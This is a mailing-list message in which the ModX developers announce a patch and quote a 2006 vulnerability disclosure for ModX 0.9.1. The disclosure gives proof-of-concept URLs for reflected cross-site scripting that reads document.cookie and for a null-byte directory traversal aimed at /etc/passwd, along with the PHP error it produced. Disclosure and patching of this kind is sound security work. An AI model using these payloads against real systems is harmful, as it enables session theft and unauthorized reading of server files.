The ModX development released a patch for these bugs this morning.
More information available at:
http://modxcms.com/forums/index.php/topic,3982.0.html

While we greatly appreciate the efforts of cR45H3R in finding these
bugs in our code, we'd also appreciate a courtesy email to the dev
team before vulnerabilities like these are made public.

Victor
(on behalf of the ModX dev team)

On Apr 14, 2006, at 1:53 AM, crasher@kecoak.or.id wrote:

>
> k k kkkk kk kkkk k k kkkkkk kkkkkk kkkk k
> k k k k
> k k k k k k k k k kk k k k k kk
> k k k k
> kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k
> k k kk
> k k k k k k k kk k k k k k k
> k k k k
> k k kkkk kk kkkk k k kk k k kkkk k
> kk k k k
>
> ]=- Vulnerabilities in ModX
>
> Author : Rusydi Hasan M
> a.k.a : cR45H3R
> Date : April,13th 2006
> Location : Indonesia, Cilacap
>
>
> ]=- Software description
>
> Version : 0.9.1
> URL : http://modxcms.com
>
>
> ]=- the bugs
>
> 1. XSS || [C]ross [S]ite [S]cripting
> 2. Reverse Directory Transversal with NULL injection
>
>
> ]=- PoC
>
> [1] XSS
>
> http://[victim]/[modx_dir]/index.php?id=[parameter][XSS_here]
>
> E[x]ample :
>
> http://127.0.0.1/modx/index.php?id=2%3Cscript%3Ealert
> (document.cookie)%3C/script%3E
>
> [2] Reverse directory Transversal + NULL injection
>
> http://[victim]/[modx_dir]/index.php?id=[parameter]
> [reverse_derectory]%00
>
> E[x]ample :
>
> http://127.0.0.1/modx/index.php?id=1.../../../../etc/
> passwd%00
>
> PHP error debug
> Error:
>
> fopen(/var/www/html/modx/assets/cache/docid_1/../../../../../../../
> etc/passwd\0.pageCache.php
> ): failed to open stream: Permission denied
>
>
> ]=- Vendor
>
> Not contact
>
>
> ]=- Shoutz
>
> #
> fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3 b,cahcephoe,scut,deg
> leng,etc
> # y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
> anonymous, the
> day
> # ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa ,m_beben
>
>
> ]=- Contact
>
> crasher@kecoak.or.id || http://kecoak.or.id
>
>